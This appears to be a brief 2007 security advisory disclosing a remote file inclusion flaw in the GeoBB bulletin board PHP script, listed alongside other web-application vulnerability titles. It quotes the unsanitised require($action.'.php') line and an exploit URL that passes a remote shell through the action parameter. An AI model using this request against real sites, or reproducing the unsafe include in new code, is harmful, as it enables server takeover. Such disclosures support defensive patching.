Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) magic photo storage website Multiple Remote File Inclusion GForge Cross Site Scripting vulnerability ppc engine Multiple file inclusion createauction (cats.asp) Remote SQL Injection Vulnerability From:ShaFuq31_(at)_HoTMaiL.CoM <ShaFuq31_(at)_HoTMaiL.CoM> Date:09.01.2007Subject:GeoBB Georgian Bulletin Board Remote File Include Vuln.# BhhGroup.Org & Bilgi-Yonetimi.Org.Tr # script name : GeoBB Georgian Bulletin Board # Script Download : http://hotscripts.com/Detailed/58100.html # Risk : High # Found By : ShaFuck31 # Vulnerable file : index.php Vuln. Code: require($action.'.php'); #Vuln : http://www.victim.com/ScriptPath/index.php?action=[sheLL] # Thanks : 4LL bL4ck h4t us3rs & my fr13ndZ #Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
magic photo storage website Multiple Remote File Inclusion
GForge Cross Site Scripting vulnerability
ppc engine Multiple file inclusion
createauction (cats.asp) Remote SQL Injection Vulnerability
